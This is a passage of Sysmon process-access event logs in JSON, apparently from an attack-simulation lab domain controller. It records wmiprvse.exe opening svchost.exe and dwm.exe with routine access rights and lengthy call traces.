|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2C20000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D3D50000}\r\nTargetProcessId: 1396\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D3D50000}","TargetProcessId":"1396","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010A6F30000}\r\nTargetProcessId: 1612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010A6F30000}","TargetProcessId":"1612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C8050100}\r\nTargetProcessId: 1844\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C8050100}","TargetProcessId":"1844","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4